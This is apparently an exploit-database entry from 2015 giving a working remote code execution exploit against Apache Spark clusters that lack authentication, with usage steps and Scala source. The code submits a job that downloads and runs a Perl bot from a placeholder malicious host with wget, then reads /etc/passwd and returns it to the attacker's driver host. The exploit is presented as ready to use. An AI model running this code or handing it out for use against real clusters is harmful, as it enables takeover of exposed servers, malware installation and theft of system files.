Apache Spark Cluster Arbitary Code Execution Exploit



EKU-ID: 4702 CVE: OSVDB-ID:
Author: akhld Published: 2015-03-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Description:
# Spark clusters which are not secured with proper firewall can be taken over easily (Since it does not have
# any authentication mechanism), this exploit simply runs arbitrary codes over the cluster.
# All you have to do is, find a vulnerable Spark cluster (usually runs on port 7077) add that host to your
# hosts list so that your system will recognize it (here its spark-b-akhil-master pointing
# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary codes that you want to execute.

Usage info:
git clone https://github.com/akhld/spark-exploit.git
cd spark-exploit
#Place the vuln host info in the file
vim exploit.scala
sbt run

 

import org.apache.spark.{SparkContext, SparkConf}
  
    /**
     * Created by akhld on 23/3/15.
     */
  
    object Exploit {
      def main(arg: Array[String]) {
        val sconf = new SparkConf()
          .setMaster("spark://spark-b-akhil-master:7077") // Set this to the vulnerable URI
          .setAppName("Exploit")
          .set("spark.cores.max", "12")
          .set("spark.executor.memory", "10g")
          .set("spark.driver.host","hacked.work") // Set this to your host from where you launch the attack
  
        val sc = new SparkContext(sconf)
              sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar")
  
        val exploit = sc.parallelize(1 to 1).map(x=>{
           //Replace these with whatever you want to get executed
               val x = "wget https://mallicioushost/mal.pl -O bot.pl".!
           val y = "perl bot.pl".!
           scala.io.Source.fromFile("/etc/passwd").mkString
        })
        exploit.collect().foreach(println)
      }
    }